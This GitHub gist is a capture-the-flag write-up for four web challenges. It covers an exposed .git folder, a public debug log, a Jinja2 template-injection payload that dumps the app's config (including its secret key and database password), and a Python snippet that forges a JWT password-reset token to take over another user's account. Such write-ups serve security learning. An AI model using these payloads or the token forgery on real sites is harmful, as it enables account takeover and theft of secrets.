Last active
May 29, 2022 11:29
-
-
Save ricardojba/5efa20639d2be5d3ca9c6d39cc4ccb5d to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- challenge 1: | |
| From the name of the challenge it was a dead giveway that there was a .git folder exposed. | |
| Then just find out where the git repo is hosted: | |
| curl http://0x70.apl3b.com/.git/config | |
| And get the repo hosting service: | |
| https://gitlab.com/DDuarte/twipy.git | |
| Finally check all the commits and on this one at the bottom of the page you can read a flag: | |
| https://gitlab.com/DDuarte/twipy/commit/508cc297eb2d5412a5f994e87a27b43ffbf033a4 | |
| {flag}Us3_vault_for_no_p4sswords_1n_s0urce_cod3. | |
| -- challenge 2: | |
| Just use dirsearch.py | |
| or | |
| search the repo for the word "debug". Again the hint from the challenge name helped here: | |
| https://gitlab.com/search?utf8=%E2%9C%93&snippets=&scope=&search=debug&project_id=10269530 | |
| Get the file from the website and read the flag on the error messages: | |
| http://0x70.apl3b.com/debug.log | |
| {flag}b3_c4r3ful_w1th_Wh4t_y0u_l34v3_pUbl1c | |
| -- challenge 3: | |
| Vulnerability: Server Side Template Injection (SSTI) jinja2/Flask | |
| Some references: | |
| https://ctftime.org/writeup/10895 | |
| https://eugenekolo.com/blog/hitcon-ctf-2016-writeups/ | |
| https://hackerone.com/reports/125980 | |
| Register a user on the website http://0x70.apl3b.com and create a private post with: {{config}} | |
| Hint: don't use your real email --> OPSEC (un)safe debug.log ;) | |
| You just posted: <Config {'JSON_AS_ASCII': True, 'BOOTSTRAP_LOCAL_SUBDOMAIN': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAIL_USERNAME': '[email protected]', 'SQLALCHEMY_POOL_RECYCLE': None, 'SQLALCHEMY_ECHO': "False", 'SQLALCHEMY_TRACK_MODIFICATIONS': "False", 'SQLALCHEMY_POOL_TIMEOUT': None, 'SQLALCHEMY_RECORD_QUERIES': None, 'SESSION_COOKIE_DOMAIN': "False", 'SESSION_COOKIE_NAME': 'session', 'MAX_COOKIE_SIZE': 4093, 'BOOTSTRAP_QUERYSTRING_REVVING': True, 'MAIL_SERVER': 'smtp.gmail.com', 'SQLALCHEMY_NATIVE_UNICODE': None, 'MAX_CONTENT_LENGTH': None, 'MAIL_USE_TLS': "False", 'ELASTICSEARCH_URL': 'el:9200', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'SQLALCHEMY_POOL_SIZE': None, 'SQLALCHEMY_MAX_OVERFLOW': None, 'ADMINS': ['[email protected]'], 'TRAP_HTTP_EXCEPTIONS': "False", 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SESSION_COOKIE_PATH': None, 'BOOTSTRAP_SERVE_LOCAL': "False", 'SESSION_COOKIE_SAMESITE': None, 'SECRET_KEY': 'yJmsCAeao5zOM3gvoxHrOyM5HGJTTDpQ7UxAIHneCxc=', 'APPLICATION_ROOT': '/', 'SERVER_NAME': None, 'PREFERRED_URL_SCHEME': 'http', 'TESTING': "False", 'TEMPLATES_AUTO_RELOAD': None, 'JSONIFY_MIMETYPE': 'application/json', 'MAIL_USE_SSL': True, 'USE_X_SENDFILE': "False", 'SQLALCHEMY_DATABASE_URI': 'mysql+pymysql://twipy:RkZDwtkaZ9ugnwf@db/twipy', 'SESSION_COOKIE_SECURE': "False", 'POSTS_PER_PAGE': 8, 'BOOTSTRAP_USE_MINIFIED': True, 'SQLALCHEMY_BINDS': None, 'FLAG': '{flag}V4lid4t3_always_us3r_1NPUT', 'ENV': 'production', 'DEBUG': "False", 'SQLALCHEMY_COMMIT_ON_TEARDOWN': "False", 'EXPLAIN_TEMPLATE_LOADING': "False", 'MAIL_PASSWORD': None, 'JSONIFY_PRETTYPRINT_REGULAR': "False", 'BOOTSTRAP_CDN_FORCE_SSL': "False", 'PROPAGATE_EXCEPTIONS': None, 'TRAP_BAD_REQUEST_ERRORS': None, 'JSON_SORT_KEYS': True, 'SESSION_COOKIE_HTTPONLY': True, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'MAIL_PORT': 465}> | |
| {flag}V4lid4t3_always_us3r_1NPUT | |
| -- challenge 4: | |
| Reset Willis password by forging the reset password token since we extracted the SECRET_KEY value from the app. | |
| Get the password reset token format | |
| https://gitlab.com/DDuarte/twipy/blob/master/app/models.py#L111 | |
| Get Willis email | |
| https://gitlab.com/DDuarte/twipy/blob/master/twipy.py#L14 | |
| Get the UUID of the user Willis: | |
| http://0x70.apl3b.com/explore?page=25 | |
| Generate the password reset token: | |
| pyenv global 2.7.15 | |
| pip install PyJWT | |
| python | |
| import jwt | |
| import base64 | |
| from time import time | |
| token = jwt.encode({'id': '70a82737-a6d9-4284-93db-0600db6f05ca', 'name': 'Willis Adams', 'email': '[email protected]', 'exp': time() + 600},base64.b64decode('yJmsCAeao5zOM3gvoxHrOyM5HGJTTDpQ7UxAIHneCxc='),algorithm='HS256').decode('utf-8') | |
| print(token) | |
| quit() | |
| Reset Willis password URL: | |
| http://0x70.apl3b.com/auth/reset_password/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6IndpbGxpcy5hZGFtc0BleGFtcGxlLmNvbSIsImlkIjoiNzBhODI3MzctYTZkOS00Mjg0LTkzZGItMDYwMGRiNmYwNWNhIiwiZXhwIjoxNTQ3NzM1NjA0LjIzODk3MSwibmFtZSI6IldpbGxpcyBBZGFtcyJ9.wm73GeCyWRR2aCE_xXtsVkDnjiwVbput62sVe_V3JW0 | |
| See the user Willis second private post | |
| {flag}4lw4ys_v3r1fy_y0ur_t0k3NS |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment